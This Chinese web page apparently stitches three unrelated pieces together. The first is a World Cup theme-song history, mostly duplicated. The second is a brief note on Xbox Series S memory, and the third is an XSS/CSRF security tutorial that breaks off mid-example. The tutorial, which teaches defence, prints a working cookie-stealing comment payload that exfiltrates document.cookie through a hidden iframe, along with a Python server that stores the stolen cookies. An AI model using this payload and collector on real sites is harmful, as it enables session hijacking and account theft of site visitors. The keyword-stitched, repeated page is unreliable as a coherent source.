本文目录一览:
历届世界杯的主题曲是什么?
世界杯开始有主题歌始于1986年墨西哥世界杯,历届世界杯主题歌如下:
1986
别样的英雄“A Special Kind of Hero”1986年墨西哥世界杯
演唱者:斯黛芬妮.劳伦斯(Stephanie Lawrence)
1986年的世界杯是属于马拉多纳的,这位阿根廷天皇巨星以“上帝之手”和连过五人的长途奔袭进球得分,闻名于世,并为本队再次夺得世界杯桂冠。这首充满传统色彩的大气歌曲后来一直被视为颂扬马拉多纳的赞歌,究其原因是它曾出现在那届世界杯赛官方影片《英雄》的结尾,而画面恰恰是马拉多纳在球场上英武拼杀的慢动作镜头。此歌演唱者是著名的舞台剧演员斯黛芬妮.劳伦斯,但该曲是否为当届主题曲,还鲜有明证。
斯黛芬妮.劳伦斯
出生于英国的音乐家庭,父母从事音乐和舞蹈。她因在伦敦一些最著名的音乐剧中出演而知名。16岁登上舞台后,不久去百老汇发展,也在电影和电视中客串角色。自1981年接任安德鲁.韦伯的名剧《埃薇塔》(又名:贝隆夫人Evita)起,她陆续出演了《玛莉莲》(Marilyn!)、《星光快车》(Starlight Express)、《猫》(Cats)的主角。1993年因主演《热血兄弟》(Blood Brother)而获得托尼奖提名,她1989年曾出演电影版的《歌剧院魅影》。2000年11月4日在伦敦寓所过世,享年50岁。
1990
“意大利之夏” (UN'ESTATE ITALIANA)1990年意大利世界杯主题曲
英语版本名称为:To Be Number One
演唱者:吉奥吉.莫罗德(Giorgio Moroder)和吉娜.娜尼尼(Gianna Nannini)
“意大利之夏”或许是最成功的世界杯主题曲,至今仍被资深球迷和歌迷所津津乐道。这是首悠扬动听,又振奋人心的歌曲,意大利人将亚平宁半岛上的海风和足球王国对足球运动的理解糅合成迷人的音乐。这首歌有数个版本,原唱录音版较舒缓传统;现场演唱版则加入更多摇滚节奏;因为作曲的是意大利电子乐大师吉奥吉,也有过节奏强劲的混音版。超级球迷香港天王谭咏麟也曾将此歌改成粤语版本的“理想与和平”。两位原唱者都是意大利最著名的流行乐大师,并且此歌也是两人合作写成的,英语版由吉奥吉演唱。
吉奥吉.莫罗德
意大利最著名的电子音乐先锋,是20世纪70年代迪斯科音乐发展中的标志人物。这位1940年4月26日生于奥提西的意大利人,曾经赢得过3座奥斯卡奖和4次金球奖。他有着传奇式的经历,所涉及的领域几乎都带给他巨大的荣誉。他曾经是位吉他手,19岁组建了自己的乐队Covers,出没于欧洲的夜总会中。70年代起,他专心于音乐制作,1969年他推出自己制作的处女单曲“瞧一瞧”(Looky Looky),并与合作伙伴佩特.贝洛特(Pete Bellotte)组成了制作组合。他们的辉煌来自于发掘了曾经当和声歌手的多娜.桑莫(Donna Summer),由此缔造了一种对迪斯科影响深远的音乐现象。70年代后期,莫罗德开始接触电影配乐。并在整个80年代倾心于此工作。他在电影方面最著名的作品是由汤姆.克鲁斯主演的影片《壮志雄心》的主题曲“带走我的呼吸”(Take my breath away)。该曲不仅雄踞英美各大排行榜之首,并摘得奥斯卡最佳歌曲奖。
吉娜.娜尼尼
吉娜1956年6月14日生于意大利迷人的图斯卡尼省。她从小就显现出音乐天赋,在她身上所蕴涵的自然、反叛和自信使她19岁就离家来到米兰闯荡。1976年,她推出同名首张专辑。1979年她做出冒险决定,只身闯荡美国探询摇滚乐根源。虽然她经历了种种失望,但还是深深地发掘出自己的摇滚根源。经过挫折与努力,吉娜成为世界级明星,频繁在欧洲成功举行巡回演唱会,不断与众多著名音乐人有过合作。1989年她同艾多拉多.班那托合作写词了1990年世界杯赛的主题曲“意大利之夏”的歌词,并与吉奥吉在米兰的开幕式携手歌唱。
1994
“荣耀之地”(Gloryland)〈1994年美国世界杯主题曲〉
演唱者:达利尔.豪(Daryl Hall)
美国一直是足球运动的处女地,把世界杯主办权交到他们手里似乎是个错误的选择,主题曲也变得黯淡。这首“荣耀之地”虽然有个响亮的名字,但是英雄主义色彩在这首歌中荡然无存。“荣耀之地”在音乐风格上更接近于民谣与流行摇滚乐的结合,很有些美国西部荒原的苍茫感。1994年作者兼主唱达利尔创作了此歌,并邀请福音曲演唱组合“黑暗之声”(Sounds of blackness)协助录制。由于作品缺乏对足球运动的共鸣,很快淹没在人们的记忆之中。1994年的世界杯合辑中收录的其他大牌艺人的作品倒是要比主题曲精彩得多。
达利尔.豪
达利尔.豪是美国70和80年代知名组合“豪与奥兹双人组”(Hall and Oates)的成员之一。他1946年10月11日出生,原名Daryl Franklin Hohl。来自费城的达利尔在坦普尔大学结识了后来的伙伴约翰.奥兹(John Oates)。他们几经分合,最后在汤米.莫托拉(Tommy Mottola,后来也是玛莉亚凯莉的经理人)的运作下,签约亚特兰大唱片公司。1972年推出首张专辑《纯粹的奥兹》(Whole Oates)。1984年他们成为历史上排名最高的民谣二人组,同年组合解散,各自发展,1988年为了专辑《Ooh Yeah!》重组。至今他仍有新专辑推出。
从1998年起,世界杯赛的主题曲不再仅限于一首,而且开始灌录世界杯官方专辑唱片。1998年的《Allez! Ola! Ole! 》中就收录了15首代表参赛各国的足球歌曲。官方主题歌为“我踢球你介意吗”和“生命之杯”。
1998
“我踢球你介意吗”(法语:La Cour des Grands,英语:Do you mind if I play)〈1998年法国世界杯主题曲1〉
演唱者:尤索.恩多(Youssou N'Dour )& 阿克塞拉.瑞德(Axelle Red)
“我踢球你介意吗”是首轻快的歌曲,带着浓烈的热带情调和欢快的吟唱风格。演唱者都不是法国人,歌曲没有明显的法国特点,可能也正应和了世界杯融合交流的主题,并符合法国人喜好出人意料的性格。但很多人认为并不好听。
尤索.恩多
尤索.恩多是目前世界乐坛最著名的世界音乐歌手之一,这位嗓音独特的塞内加尔人生于1959年10月。美国著名乐评杂志《滚石》是这样评价他的:“如果有哪位来自第三世界的艺人在全球影响力上能和鲍伯.马里(Bob Marley)相提并论的话,那只有尤索.恩多。他的嗓音独特,古老非洲的历史似乎都凝结在他的声线之中。”
阿克塞拉.瑞德
1968年生于比利时的海塞尔特,3岁起学习舞蹈并接触音乐,从莫扎特到南部灵歌,她都有所涉猎。1983年用英语录制了第一张单曲,因为英语最适合她想唱的这类歌曲。在Virgin唱片的支持下,她继续女性灵歌风格的探索。1993年她的第一张专辑《Sans Plus Attendre》终于为她不仅在比利时,更在法语地区赢得了声誉。1998年6月她同尤索.恩多在世界杯开幕式上向法兰西体育场内8万球迷和全球数亿观众演唱了这首充满欢快节奏和热带韵律的歌曲。
瑞奇.马汀(Ricky Martin)
瑞奇.马汀是世界级偶像歌手,并引领着拉丁音乐浪潮。该歌曲选自他1998年专辑《让爱继续》(Vuelve),并获得全球30个国家单曲排行的冠军,也是1998年法国世界杯的另一首主题曲。“生命之杯” 在世界杯之后也传播甚广,成为很多足球节目用来烘托气氛的第一选用曲目。歌曲中的鼓乐节奏和号角奏鸣都颇为煽情。
瑞奇.马汀1971年12月24日生于波多黎各,6岁起开始接拍电视广告,很快对表演产生浓厚兴趣。12岁时,瑞奇.马汀加入了少年偶像团体Menudo,这是一支拉丁乐历史上最受欢迎的组合。17岁的马汀在离开Menudo后,决定放下明星身份,重新走入学校完成他最后的高中学业。毕业后,他毅然来到美国纽约。以个人姿态进军歌坛的瑞奇.马汀,1991年推出了首张同名专辑,获得巨大成功,并在全球许多国家掀起了一股拉丁乐狂潮。1994年,瑞奇.马汀参演了电视连续剧《急诊室的故事》,这部在美国ABC电视台收视率颇高的肥皂剧使瑞奇的知名度再次得到了空前提高。1996年,让瑞奇.马汀走红全球的专辑《A Medio Vivir》发行,其中收录的歌曲呈现多元化风貌,收录有法国9周冠军曲“Maria”。令瑞奇走向世界的歌曲“生命之杯”(La Copa De La Vida / The Cup Of Life)收录在大碟《Vuelve》中,他以西班牙文唱出火热的气氛。
2002
2002年世界杯音乐的选择早早已经确定。“风暴”担纲全球主题曲,日韩新锐歌手组成“日韩之声”演唱组共同演绎日韩版主题曲“让我们走到一起”,另一首官方主题曲——纯音乐的“足球圣歌”以电子音乐风格,为新世纪世界杯进行时尚代言。同时,索尼音乐再次负责发行《2002年世界杯官方专辑》。
阿纳斯塔西娅(Anastacia)
阿纳斯塔西娅的歌声和形象的差距令人难以置信,靓丽的偶像外型和深沉浑厚的“爵士乐”嗓音给人的视听觉冲击强烈。“风暴”曲调简洁、节奏强劲,流行的曲风给人异域感觉,和“生命之杯” 相比它少了些火般热情,多了份紧迫感强劲的冲击。
阿纳斯塔西娅原名Anastacia Newkirk,1973年9月17日出生于美国芝加哥,父亲是酒店歌手,母亲是纽约百老汇的演员。她14岁时父母离异,随母亲来到纽约,并进入艺术学校。阿纳斯塔西娅1999年参加MTV的新秀选拔赛后加入乐坛。签约Sony之后于2000年发行了个人首张专辑《并非它类》(Not That Kind)获得巨大成功,销量逾200万。2002年发行第二张专辑《自然的怪诞》(Freak of Nature),当前的单曲“Paid My Dues”在全球热播不断。阿纳斯塔西娅的演唱和舞蹈风格以随性自由为特点,金发白肤的抢眼外形之下蕴藏的却是一把“拥有纯粹的黑人灵魂的声线”。去年11月1日,国际足联最终确定阿纳斯塔西娅来演唱2002年韩日世界杯主题歌“风暴”。
范吉利斯(Vangelis)
范吉利斯的配乐以华丽见长,我们最熟悉的是将气氛烘托到极致的“火的战车”。这首主题曲中有两个版本,一首电子乐版本的作品是由芬兰音乐家JS16混音完成,兼具东方色彩和电子乐风情。另一首交响乐版传统、大气,作为专辑的结尾恰倒好处。
范吉利斯:当代最成功的电子乐作曲家、新世纪音乐大师。1943年出生于希腊,从小就显露非同一般的音乐才华,然而他拒绝接受钢琴课,并坚持自学成才。1981年荣获奥斯卡电影最佳配乐奖以《火的战车》,从此蜚声国际,电影的主题歌甚至进入美国流行榜十大,其后引发了一系列的电影音乐创作。1992年,范吉利斯获颁法国最富盛誉的艺术文学骑士勋章。他的最新作品是为美国宇航局的“2001火星奥德赛”任务创作的主题音乐“Mythodea”。
“让我们走到一起”(Let's get together now)〈2002年世界杯日韩主题歌〉
演唱者:VOICES OF KOREA/JAPAN
日本:化学超男子(Chemistry)、Sowelu
韩国:褐眼男子(Brown Eyes) 、朴正铉(Lena Park))
“让我们走到一起”是首格外清新悠扬的歌曲,它以日本流行歌曲独有的轻松和流畅,在众多世界杯歌曲中卓尔不群,它更象一首沉浸于幸福的爱情歌曲或是励志歌曲。6人的超大组合主要因为两国合办的原因,在音乐演绎上除了俊男配靓女,实力派对唱将的缘故外,也未见有更多的亮点。此歌并未收录进“新索音乐”在中国内地发行的官方专辑中。
“化学超男子”
全日本最当红的“化学超男子”由堂珍嘉邦和川要两名成员组成。两位出身平民的歌手经过严格选秀,以健康强壮的外型和肺活量十足的歌声赢得著名制作人松尾洁的青睐,并以 “化学超男子”之名顺利出道,他们三张单曲“梦的碎片”、“梦想起飞”和“你走你的路”都夺得ORICON单曲榜冠军,“梦的碎片”更创下超过150万张的销量。去年11月7日,首张专辑《化学本色》在日本发行, 不仅立刻登上ORICON专辑榜当日冠军, 同时首日出货量即高达150万张,使他们成为日本最走红的演唱组合之一。
Sowelu
年仅19岁的日本及爱尔兰混血的Sowelu,不仅拥有令人惊艳的美貌,她充满灵魂感的歌唱实力更让她在正式出道前就可以参与这次世界杯的国际合作。制作人松尾洁非常赏识Sowelu的优异天赋,在今年初发行的由松尾洁监制及选曲的合辑《流畅》(SMOOTH)中,就收录了Sowelu演唱的一首难度较高的名曲“穿越我心”(Across my heart)。Sowelu4月17日正式出道,推出首张专辑《美丽梦想者》(Beautiful Dreamer)。
“褐眼男子”
“褐眼男子”是去年韩国最受注目的新人。由身兼写歌、写词、制作人的尹建和多才多艺的主唱那易(NaEar)所组成的。首支单曲“一年后”MTV在韩国一鸣惊人,长达7分钟的情节,更是请到了国际级导演王家卫执导。该组合并不经常出现在媒体面前,潜心做音乐。
朴正炫
朴正炫被称为韩国世界级美声的唯一代表。1998年崛起于韩国乐坛的她,首张专辑《菁华剪影》(piece)大获好评让她成为全韩偶像风潮狂炽中,唯一凭演唱实力创造轰动的唱将。她可以放弃很多演唱技巧,而用最熟悉、最自然的嗓音表现各种类型的歌曲,引来韩国众多重量级艺人的钦佩,并乐于和她合作。
1986
别样的英雄“A Special Kind of Hero
mms://media.chinabroadcast.cn/chi/sports/sq060307003.wma
下载
演唱者:斯黛芬妮.劳伦斯(Stephanie Lawrence)
1986年的世界杯是属于马拉多纳的,这位阿根廷天皇巨星以“上帝之手”和连过五人的长途奔袭进球得分,闻名于世,并为本队再次夺得世界杯桂冠。这首充满传统色彩的大气歌曲后来一直被视为颂扬马拉多纳的赞歌,究其原因是它曾出现在那届世界杯赛官方影片《英雄》的结尾,而画面恰恰是马拉多纳在球场上英武拼杀的慢动作镜头。此歌演唱者是著名的舞台剧演员斯黛芬妮-劳伦斯,但该曲是否为当届主题曲,还鲜有明证。
斯黛芬妮.劳伦斯
出生于英国的音乐家庭,父母从事音乐和舞蹈。她因在伦敦一些最著名的音乐剧中出演而知名。16岁登上舞台后,不久去百老汇发展,也在电影和电视中客串角色。自1981年接任安德鲁-韦伯的名剧《埃薇塔》(又名:贝隆夫人Evita)起,她陆续出演了《玛莉莲》(Marilyn!)、《星光快车》(Starlight Express)、《猫》(Cats)的主角。1993年因主演《热血兄弟》(Blood Brother)而获得托尼奖提名,她1989年曾出演电影版的《歌剧院魅影》。2000年11月4日在伦敦寓所过世,享年50岁。
1990
“意大利之夏” (UN'ESTATE ITALIANA)
下载
演唱者:吉奥吉.莫罗德(Giorgio Moroder)和吉娜.娜尼尼(Gianna Nannini)
“意大利之夏”或许是最成功的世界杯主题曲,至今仍被资深球迷和歌迷所津津乐道。这是首悠扬动听,又振奋人心的歌曲,意大利人将亚平宁半岛上的海风和足球王国对足球运动的理解糅合成迷人的音乐。这首歌有数个版本,原唱录音版较舒缓传统;现场演唱版则加入更多摇滚节奏;因为作曲的是意大利电子乐大师吉奥吉,也有过节奏强劲的混音版。超级球迷香港天王谭咏麟也曾将此歌改成粤语版本的“理想与和平”。两位原唱者都是意大利最著名的流行乐大师,并且此歌也是两人合作写成的,英语版由吉奥吉演唱。
吉奥吉.莫罗德
意大利最著名的电子音乐先锋,是20世纪70年代迪斯科音乐发展中的标志人物。这位1940年4月26日生于奥提西的意大利人,曾经赢得过3座奥斯卡奖和4次金球奖。他有着传奇式的经历,所涉及的领域几乎都带给他巨大的荣誉。他曾经是位吉他手,19岁组建了自己的乐队Covers,出没于欧洲的夜总会中。70年代起,他专心于音乐制作,1969年他推出自己制作的处女单曲“瞧一瞧”(Looky Looky),并与合作伙伴佩特-贝洛特(Pete Bellotte)组成了制作组合。他们的辉煌来自于发掘了曾经当和声歌手的多娜-桑莫(Donna Summer),由此缔造了一种对迪斯科影响深远的音乐现象。70年代后期,莫罗德开始接触电影配乐。并在整个80年代倾心于此工作。他在电影方面最著名的作品是由汤姆-克鲁斯主演的影片《壮志雄心》的主题曲“带走我的呼吸”(Take my breath away)。该曲不仅雄踞英美各大排行榜之首,并摘得奥斯卡最佳歌曲奖。
吉娜.娜尼尼
吉娜1956年6月14日生于意大利迷人的图斯卡尼省。她从小就显现出音乐天赋,在她身上所蕴涵的自然、反叛和自信使她19岁就离家来到米兰闯荡。1976年,她推出同名首张专辑。1979年她做出冒险决定,只身闯荡美国探询摇滚乐根源。虽然她经历了种种失望,但还是深深地发掘出自己的摇滚根源。经过挫折与努力,吉娜成为世界级明星,频繁在欧洲成功举行巡回演唱会,不断与众多著名音乐人有过合作。1989年她同艾多拉多-班那托合作写词了1990年世界杯赛的主题曲“意大利之夏”的歌词,并与吉奥吉在米兰的开幕式携手歌唱。
1994
“荣耀之地”(Gloryland)
下载
演唱者:达利尔.豪(Daryl Hall)
美国一直是足球运动的处女地,把世界杯主办权交到他们手里似乎是个错误的选择,主题曲也变得黯淡。这首“荣耀之地”虽然有个响亮的名字,但是英雄主义色彩在这首歌中荡然无存。“荣耀之地”在音乐风格上更接近于民谣与流行摇滚乐的结合,很有些美国西部荒原的苍茫感。1994年作者兼主唱达利尔创作了此歌,并邀请福音曲演唱组合“黑暗之声”(Sounds of blackness)协助录制。由于作品缺乏对足球运动的共鸣,很快淹没在人们的记忆之中。1994年的世界杯合辑中收录的其他大牌艺人的作品倒是要比主题曲精彩得多。
达利尔.豪
达利尔.豪是美国70和80年代知名组合“豪与奥兹双人组”(Hall and Oates)的成员之一。他1946年10月11日出生,原名Daryl Franklin Hohl。来自费城的达利尔在坦普尔大学结识了后来的伙伴约翰-奥兹(John Oates)。他们几经分合,最后在汤米.莫托拉(Tommy Mottola,后来也是玛莉亚凯莉的经理人)的运作下,签约亚特兰大唱片公司。1972年推出首张专辑《纯粹的奥兹》(Whole Oates)。1984年他们成为历史上排名最高的民谣二人组,同年组合解散,各自发展,1988年为了专辑《Ooh Yeah!》重组。至今他仍有新专辑推出。
另外94年还有一首很流行:我们是冠军
下载
1998
“生命之杯”(La Copa De La Vida)
下载
演唱者:瑞奇.马汀(Ricky Martin)
瑞奇.马汀是世界级偶像歌手,并引领着拉丁音乐浪潮。该歌曲选自他1998年专辑《让爱继续》(Vuelve),并获得全球30个国家单曲排行的冠军,也是1998年法国世界杯的另一首主题曲。“生命之杯” 在世界杯之后也传播甚广,成为很多足球节目用来烘托气氛的第一选用曲目。歌曲中的鼓乐节奏和号角奏鸣都颇为煽情。
瑞奇.马汀
瑞奇.马汀1971年12月24日生于波多黎各,6岁起开始接拍电视广告,很快对表演产生浓厚兴趣。12岁时,瑞奇-马汀加入了少年偶像团体Menudo,这是一支拉丁乐历史上最受欢迎的组合。17岁的马汀在离开Menudo后,决定放下明星身份,重新走入学校完成他最后的高中学业。毕业后,他毅然来到美国纽约。以个人姿态进军歌坛的瑞奇-马汀,1991年推出了首张同名专辑,获得巨大成功,并在全球许多国家掀起了一股拉丁乐狂潮。1994年,瑞奇-马汀参演了电视连续剧《急诊室的故事》,这部在美国ABC电视台收视率颇高的肥皂剧使瑞奇的知名度再次得到了空前提高。1996年,让瑞奇-马汀走红全球的专辑《A Medio Vivir》发行,其中收录的歌曲呈现多元化风貌,收录有法国9周冠军曲“Maria”。令瑞奇走向世界的歌曲“生命之杯”(La Copa De La Vida / The Cup Of Life)收录在大碟《Vuelve》中,他以西班牙文唱出火热的气氛。
“我踢球你介意吗”(法语:La Cour des Grands)
下载
演唱者:尤索.恩多(Youssou N'Dour )& 阿克塞拉.瑞德(Axelle Red)
“我踢球你介意吗”是首轻快的歌曲,带着浓烈的热带情调和欢快的吟唱风格。演唱者都不是法国人,歌曲没有明显的法国特点,可能也正应和了世界杯融合交流的主题,并符合法国人喜好出人意料的性格。但很多人认为并不好听。
尤索.恩多
尤索-恩多是目前世界乐坛最著名的世界音乐歌手之一,这位嗓音独特的塞内加尔人生于1959年10月。美国著名乐评杂志《滚石》是这样评价他的:“如果有哪位来自第三世界的艺人在全球影响力上能和鲍伯-马里(Bob Marley)相提并论的话,那只有尤索-恩多。他的嗓音独特,古老非洲的历史似乎都凝结在他的声线之中。”
阿克塞拉.瑞德
1968年生于比利时的海塞尔特,3岁起学习舞蹈并接触音乐,从莫扎特到南部灵歌,她都有所涉猎。1983年用英语录制了第一张单曲,因为英语最适合她想唱的这类歌曲。在Virgin唱片的支持下,她继续女性灵歌风格的探索。1993年她的第一张专辑《Sans Plus Attendre》终于为她不仅在比利时,更在法语地区赢得了声誉。1998年6月她同尤索-恩多在世界杯开幕式上向法兰西体育场内8万球迷和全球数亿观众演唱了这首充满欢快节奏和热带韵律的歌曲。
2002
“风暴”(Boom)
下载
演唱者:阿纳斯塔西娅(Anastacia)
阿纳斯塔西娅的歌声和形象的差距令人难以置信,靓丽的偶像外型和深沉浑厚的“爵士乐”嗓音给人的视听觉冲击强烈。“风暴”曲调简洁、节奏强劲,流行的曲风给人异域感觉,和“生命之杯” 相比它少了些火般热情,多了份紧迫感强劲的冲击。
阿纳斯塔西娅
阿纳斯塔西娅原名Anastacia Newkirk,1973年9月17日出生于美国芝加哥,父亲是酒店歌手,母亲是纽约百老汇的演员。她14岁时父母离异,随母亲来到纽约,并进入艺术学校。阿纳斯塔西娅1999年参加MTV的新秀选拔赛后加入乐坛。签约Sony之后于2000年发行了个人首张专辑《并非它类》(Not That Kind)获得巨大成功,销量逾200万。2002年发行第二张专辑《自然的怪诞》(Freak of Nature),当前的单曲“Paid My Dues”在全球热播不断。阿纳斯塔西娅的演唱和舞蹈风格以随性自由为特点,金发白肤的抢眼外形之下蕴藏的却是一把“拥有纯粹的黑人灵魂的声线”。去年11月1日,国际足联最终确定阿纳斯塔西娅来演唱2002年韩日世界杯主题歌“风暴”。
“足球圣歌”(Anthem)
下载
演唱者:范吉利斯(Vangelis)
范吉利斯的配乐以华丽见长,我们最熟悉的是将气氛烘托到极致的“火的战车”。这首主题曲中有两个版本,一首电子乐版本的作品是由芬兰音乐家JS16混音完成,兼具东方色彩和电子乐风情。另一首交响乐版传统、大气,作为专辑的结尾恰倒好处。
范吉利斯:当代最成功的电子乐作曲家、新世纪音乐大师。1943年出生于希腊,从小就显露非同一般的音乐才华,然而他拒绝接受钢琴课,并坚持自学成才。1981年荣获奥斯卡电影最佳配乐奖以《火的战车》,从此蜚声国际,电影的主题歌甚至进入美国流行榜十大,其后引发了一系列的电影音乐创作。1992年,范吉利斯获颁法国最富盛誉的艺术文学骑士勋章。他的最新作品是为美国宇航局的“2001火星奥德赛”任务创作的主题音乐“Mythodea”。
2006
Time of Our Lives(我们生命中的时光)
... _1147801267_713.mp3下载
下载
由Sony BMG唱片公司著名作曲家约尔根·埃洛弗松(Jorgen Elofsson)作曲,超级制作人史蒂夫·麦克(Steve Mac)制作的2006年德国世界杯主题曲“我们生命中的时光”(Time of Our Lives)将在6月9曰慕尼黑的世界杯开幕式上由红遍全球Pop Opera跨界团体Il Divo“美声绅士”组合与RB天后Toni Braxton共同首演。
这首世界杯主题曲是迄今为止感觉最抒情的一首,虽然没有98世界杯瑞奇马丁演唱的那首主题歌劲爆,更没有《意大利之夏》经典,但却不失为一首好歌!
2010南非世界杯主题曲Wavin Flag:本届世界杯主题曲名为“Wavin Flag”,其中文译名“旗帜飘扬”。世界杯主题曲演唱者是来自加拿大的31岁歌手“克南”。
2010南非世界杯主题曲 作者“克南”
“克南”出生在索马里,由于国内局势动荡,他13岁时随家人移居加拿大。但克南仍然心系索马里,他创作的很多歌曲都和索马里局势相关。《飘扬的旗帜》是他今年2月底发行的专辑《游吟诗人》中的一首歌,歌曲带有浓郁的非洲气息,表达了对这片充满战火、贫穷和落后的土地不离不弃的热爱。
在今年9月国际足联举行的世界杯主题曲征集中,克南将自己的歌曲寄给了国际足联,最终被国际足联所认可,成为了南非世界杯的主题歌。
xss到手有多大内存
看你买的是多大内存。
微软终于在本周早些时候正式公布了XboxSeriesS,这是一台低配版的“XboxSeriesX”,但是价格非常便宜,人民币只要2000元左右。
主机公布以后,很多开发者对此表示了不满,因为这主机的内存比较低(XSS只有10GB的GDDR6内存,相比之下XSX有16GB),不利于开发工作。
但现在,看起来开发者们对XSS的评价并非都是负面的,一起来了解下。
前端安全方面有没有了解?xss和csrf如何攻防
在那个年代,大家一般用拼接字符串的方式来构造动态 SQL 语句创建应用,于是 SQL 注入成了很流行的攻击方式。在这个年代, 参数化查询 已经成了普遍用法,我们已经离 SQL 注入很远了。但是,历史同样悠久的 XSS 和 CSRF 却没有远离我们。由于之前已经对 XSS 很熟悉了,所以我对用户输入的数据一直非常小心。如果输入的时候没有经过 Tidy 之类的过滤,我一定会在模板输出时候全部转义。所以个人感觉,要避免 XSS 也是很容易的,重点是要“小心”。但最近又听说了另一种跨站攻击 CSRF ,于是找了些资料了解了一下,并与 XSS 放在一起做个比较。
XSS:脚本中的不速之客
XSS 全称“跨站脚本”,是注入攻击的一种。其特点是不对服务器端造成任何伤害,而是通过一些正常的站内交互途径,例如发布评论,提交含有 JavaScript 的内容文本。这时服务器端如果没有过滤或转义掉这些脚本,作为内容发布到了页面上,其他用户访问这个页面的时候就会运行这些脚本。
运行预期之外的脚本带来的后果有很多中,可能只是简单的恶作剧——一个关不掉的窗口:
1
2
3
while (true) {
alert("你关不掉我~");
}
也可以是盗号或者其他未授权的操作——我们来模拟一下这个过程,先建立一个用来收集信息的服务器:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
#!/usr/bin/env python
#-*- coding:utf-8 -*-
"""
跨站脚本注入的信息收集服务器
"""
import bottle
app = bottle.Bottle()
plugin = bottle.ext.sqlite.Plugin(dbfile='/var/db/myxss.sqlite')
app.install(plugin)
@app.route('/myxss/')
def show(cookies, db):
SQL = 'INSERT INTO "myxss" ("cookies") VALUES (?)'
try:
db.execute(SQL, cookies)
except:
pass
return ""
if __name__ == "__main__":
app.run()
然后在某一个页面的评论中注入这段代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
// 用 script type="text/javascript"/script 包起来放在评论中
(function(window, document) {
// 构造泄露信息用的 URL
var cookies = document.cookie;
var xssURIBase = "";
var xssURI = xssURIBase + window.encodeURI(cookies);
// 建立隐藏 iframe 用于通讯
var hideFrame = document.createElement("iframe");
hideFrame.height = 0;
hideFrame.width = 0;
hideFrame.style.display = "none";
hideFrame.src = xssURI;
// 开工
document.body.appendChild(hideFrame);
})(window, document);
于是每个访问到含有该评论的页面的用户都会遇到麻烦——他们不知道背后正悄悄的发起了一个请求,是他们所看不到的。而这个请求,会把包含了他们的帐号和其他隐私的信息发送到收集服务器上。
我们知道 AJAX 技术所使用的 XMLHttpRequest 对象都被浏览器做了限制,只能访问当前域名下的 URL,所谓不能“跨域”问题。这种做法的初衷也是防范 XSS,多多少少都起了一些作用,但不是总是有用,正如上面的注入代码,用 iframe 也一样可以达到相同的目的。甚至在愿意的情况下,我还能用 iframe 发起 POST 请求。当然,现在一些浏览器能够很智能地分析出部分 XSS 并予以拦截,例如新版的 Firefox、Chrome 都能这么做。但拦截不总是能成功,何况这个世界上还有大量根本不知道什么是浏览器的用户在用着可怕的 IE6。从原则上将,我们也不应该把事关安全性的责任推脱给浏览器,所以防止 XSS 的根本之道还是过滤用户输入。用户输入总是不可信任的,这点对于 Web 开发者应该是常识。
正如上文所说,如果我们不需要用户输入 HTML 而只想让他们输入纯文本,那么把所有用户输入进行 HTML 转义输出是个不错的做法。似乎很多 Web 开发框架、模版引擎的开发者也发现了这一点,Django 内置模版和 Jinja2 模版总是默认转义输出变量的。如果没有使用它们,我们自己也可以这么做。PHP 可以用 htmlspecialchars 函数,Python 可以导入 cgi 模块用其中的 cgi.escape 函数。如果使用了某款模版引擎,那么其必自带了方便快捷的转义方式。
真正麻烦的是,在一些场合我们要允许用户输入 HTML,又要过滤其中的脚本。Tidy 等 HTML 清理库可以帮忙,但前提是我们小心地使用。仅仅粗暴地去掉 script 标签是没有用的,任何一个合法 HTML 标签都可以添加 onclick 一类的事件属性来执行 JavaScript。对于复杂的情况,我个人更倾向于使用简单的方法处理,简单的方法就是白名单重新整理。用户输入的 HTML 可能拥有很复杂的结构,但我们并不将这些数据直接存入数据库,而是使用 HTML 解析库遍历节点,获取其中数据(之所以不使用 XML 解析库是因为 HTML 要求有较强的容错性)。然后根据用户原有的标签属性,重新构建 HTML 元素树。构建的过程中,所有的标签、属性都只从白名单中拿取。这样可以确保万无一失——如果用户的某种复杂输入不能为解析器所识别(前面说了 HTML 不同于 XML,要求有很强的容错性),那么它不会成为漏网之鱼,因为白名单重新整理的策略会直接丢弃掉这些未能识别的部分。最后获得的新 HTML 元素树,我们可以拍胸脯保证——所有的标签、属性都来自白名单,一定不会遗漏。
现在看来,大多数 Web 开发者都了解 XSS 并知道如何防范,往往大型的 XSS 攻击(包括前段时间新浪微博的 XSS 注入)都是由于疏漏。我个人建议在使用模版引擎的 Web 项目中,开启(或不要关闭)类似 Django Template、Jinja2 中“默认转义”(Auto Escape)的功能。在不需要转义的场合,我们可以用类似 的方式取消转义。这种白名单式的做法,有助于降低我们由于疏漏留下 XSS 漏洞的风险。
另外一个风险集中区域,是富 AJAX 类应用(例如豆瓣网的阿尔法城)。这类应用的风险并不集中在 HTTP 的静态响应内容,所以不是开启模版自动转义能就能一劳永逸的。再加上这类应用往往需要跨域,开发者不得不自己打开危险的大门。这种情况下,站点的安全非常 依赖开发者的细心和应用上线前有效的测试。现在亦有不少开源的 XSS 漏洞测试软件包(似乎有篇文章提到豆瓣网的开发也使用自动化 XSS 测试),但我都没试用过,故不予评价。不管怎么说,我认为从用户输入的地方把好关总是成本最低而又最有效的做法。
CSRF:冒充用户之手
起初我一直弄不清楚 CSRF 究竟和 XSS 有什么区别,后来才明白 CSRF 和 XSS 根本是两个不同维度上的分类。XSS 是实现 CSRF 的诸多途径中的一条,但绝对不是唯一的一条。一般习惯上把通过 XSS 来实现的 CSRF 称为 XSRF。
CSRF 的全称是“跨站请求伪造”,而 XSS 的全称是“跨站脚本”。看起来有点相似,它们都是属于跨站攻击——不攻击服务器端而攻击正常访问网站的用户,但前面说了,它们的攻击类型是不同维度上的分 类。CSRF 顾名思义,是伪造请求,冒充用户在站内的正常操作。我们知道,绝大多数网站是通过 cookie 等方式辨识用户身份(包括使用服务器端 Session 的网站,因为 Session ID 也是大多保存在 cookie 里面的),再予以授权的。所以要伪造用户的正常操作,最好的方法是通过 XSS 或链接欺骗等途径,让用户在本机(即拥有身份 cookie 的浏览器端)发起用户所不知道的请求。
严格意义上来说,CSRF 不能分类为注入攻击,因为 CSRF 的实现途径远远不止 XSS 注入这一条。通过 XSS 来实现 CSRF 易如反掌,但对于设计不佳的网站,一条正常的链接都能造成 CSRF。
例如,一论坛网站的发贴是通过 GET 请求访问,点击发贴之后 JS 把发贴内容拼接成目标 URL 并访问:
标题content=内容
那么,我只需要在论坛中发一帖,包含一链接:
我是脑残content=哈哈
